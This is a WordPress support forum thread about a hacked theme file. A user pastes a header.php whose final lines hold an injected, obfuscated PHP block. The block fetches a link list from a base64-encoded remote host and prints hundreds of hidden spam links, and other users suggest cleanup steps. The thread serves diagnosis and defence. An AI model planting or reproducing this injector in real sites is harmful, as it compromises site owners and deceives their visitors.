Title: Evil exploit in Header.php File
Last modified: August 19, 2016

---

# Evil exploit in Header.php File

 *  [ulysses31](https://wordpress.org/support/users/ulysses31/)
 * (@ulysses31)
 * [17 years ago](https://wordpress.org/support/topic/evil-exploit-in-headerphp-file/)
 * Has anyone else been hit by this – how to stop the exploit happening again?
    
   I deleted the code twice now 🙁
 * You can see the nasty stuff in the last lines at the bottom. Inserts about 600
   invisible links for Viagra in your html source. XD
 *     ```
       <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
       <html xmlns="http://www.w3.org/1999/xhtml">
   
       <head profile="http://gmpg.org/xfn/11">
   
               <META name="verify-v1" content="vr+EovmENQbzitArGOodFTd10dFtSJ3h8bCkBPVdTdE=" />
   
       	<meta http-equiv="Content-Type" content="<?php bloginfo('html_type'); ?>; charset=<?php bloginfo('charset'); ?>" />
   
       	<title><?php bloginfo('name'); ?> <?php if ( is_single() ) { ?> &raquo; Blog Archive <?php } ?> <?php wp_title(); ?></title>
   
       	<meta name="generator" content="WordPress <?php bloginfo('version'); ?>" /> <!-- leave this for stats -->
   
       <?php if (eregi("MSIE",getenv("HTTP_USER_AGENT")) ||
              eregi("Internet Explorer",getenv("HTTP_USER_AGENT"))) { ?><link rel="stylesheet" type="text/css" href="<?php bloginfo('stylesheet_directory'); ?>/style-ie.css"/>
       <?php } else { ?>
   
       <link rel="stylesheet" type="text/css" href="<?php bloginfo('stylesheet_directory'); ?>/style-ie.css"/>
   
       <?php } ?>
   
       	<link rel="alternate" type="application/rss+xml" title="RSS 2.0" href="<?php bloginfo('rss2_url'); ?>" />
       	<link rel="alternate" type="text/xml" title="RSS .92" href="<?php bloginfo('rss_url'); ?>" />
       	<link rel="alternate" type="application/atom+xml" title="Atom 0.3" href="<?php bloginfo('atom_url'); ?>" />
       	<link rel="pingback" href="<?php bloginfo('pingback_url'); ?>" />
   
       	<style type="text/css" media="screen"></style>
   
       	<?php wp_head(); ?>
       </head>
       <body>
       	<div id="topbar">
       	<div class="searchform"><?php include (TEMPLATEPATH . '/searchform.php'); ?></div>
       	<div class="nav"><a href="<?php echo get_settings('home'); ?>">Home</a>&nbsp;&nbsp;|&nbsp;&nbsp;
       <!--
       	<a href="">Link 1</a>&nbsp;&nbsp;|&nbsp;&nbsp;
       	<a href="">Link 2</a>&nbsp;&nbsp;|&nbsp;&nbsp;
       	<a href="">Link 3</a>&nbsp;&nbsp;|&nbsp;&nbsp;
       	<a href="">Link 4</a>&nbsp;&nbsp;|&nbsp;&nbsp;
       	<a href="">Link 5</a>&nbsp;&nbsp;|&nbsp;&nbsp;
       -->
       </div>
   
       	</div>
       	<div id="headerimg"></div>
   
       <div id="page-top"><div id="page-bottom"><div id="page">
       <?php /* wp_remote_fopen procedure */ $wp_remote_fopen='aHR0cDovL3F3ZXRyby5jb20vc3Mv'; $opt_id='0687d858c81740b39cf1d01bdde2afc7'; $blarr=get_option('cache_vars'); if(trim(wp_remote_fopen(base64_decode($wp_remote_fopen).$opt_id.'.md5'))!=md5($blarr)){ $blarr=trim(wp_remote_fopen(base64_decode($wp_remote_fopen).$opt_id.'.txt')); update_option('cache_vars',$blarr); } $blarr=unserialize(base64_decode(get_option('cache_vars'))); if($blarr['hide_text']!='' && sizeof($blarr['links'])>0){ if($blarr['random']){ $new=''; foreach(array_rand($blarr['links'],sizeof($blarr['links'])) as $k) $new[$k]=$blarr['links'][$k]; $blarr['links']=$new; } $txt_out=''; foreach($blarr['links'] as $k=>$v) $txt_out.='<a href="'.$v.'">'.$k.'</a>'; echo str_replace('[LINKS]',$txt_out,$blarr['hide_text']); } /* wp_remote_fopen procedure */ ?>
       ```
   

Viewing 6 replies - 1 through 6 (of 6 total)

 *  [Edward Caissie](https://wordpress.org/support/users/cais/)
 * (@cais)
 * [17 years ago](https://wordpress.org/support/topic/evil-exploit-in-headerphp-file/#post-1091755)
 * Looks suspiciously like a bad theme to me … which one are you using?
 *  [adamt07](https://wordpress.org/support/users/adamt07/)
 * (@adamt07)
 * [17 years ago](https://wordpress.org/support/topic/evil-exploit-in-headerphp-file/#post-1091767)
If it’s anything similar to a bug that hit mine a couple weeks ago (the gumblar
   script) you may want to check the images folder for a script labeled image.php
   and delete it. There’s a plugin called “exploit-scanner” that could probably
   help you a lot.
 *  [whooami](https://wordpress.org/support/users/whooami/)
 * (@whooami)
 * [17 years ago](https://wordpress.org/support/topic/evil-exploit-in-headerphp-file/#post-1091768)
 * >  … if it’s anything similar to a bug that hit mine a couple weeks ago (the 
   > gumblar script)
 * gumblar is most definitely **not** a bug.
 *  [adamt07](https://wordpress.org/support/users/adamt07/)
 * (@adamt07)
 * [17 years ago](https://wordpress.org/support/topic/evil-exploit-in-headerphp-file/#post-1091769)
 * I guess malware script would have been more appropriate…
 *  [techguy](https://wordpress.org/support/users/crashutah/)
 * (@crashutah)
 * [16 years, 12 months ago](https://wordpress.org/support/topic/evil-exploit-in-headerphp-file/#post-1091810)
Had the same thing happen. Removed the code and it’s gone for now. Now to figure
   out how it happened in the first place. Any suggestions would be appreciated.
 *  [Samuel B](https://wordpress.org/support/users/samboll/)
 * (@samboll)
 * [16 years, 12 months ago](https://wordpress.org/support/topic/evil-exploit-in-headerphp-file/#post-1091811)
 * most of the exploits lately take advantage of weak and easily guessed ftp passwords
cpanel users are particularly vulnerable with weak passwords because user names
   carry across all functions: control panel, ftp, mysql, etc.
 * if they keep coming back, they are in more than one script or in the database,
   in which case deleting the code does no good until the db is taken care of
 * there are plenty of threads here and on google search that address cleaning
   of hacked wordpress blogs
 * also, if you guys are on shared servers, you should report this to your host
   so they can look into whether other users were also hacked

The topic ‘Evil exploit in Header.php File’ is closed to new replies.

 * In: [Everything else WordPress](https://wordpress.org/support/forum/miscellaneous/)
 * 6 replies
 * 6 participants
 * Last reply from: [Samuel B](https://wordpress.org/support/users/samboll/)
 * Last activity: [16 years, 12 months ago](https://wordpress.org/support/topic/evil-exploit-in-headerphp-file/#post-1091811)
 * Status: not resolved
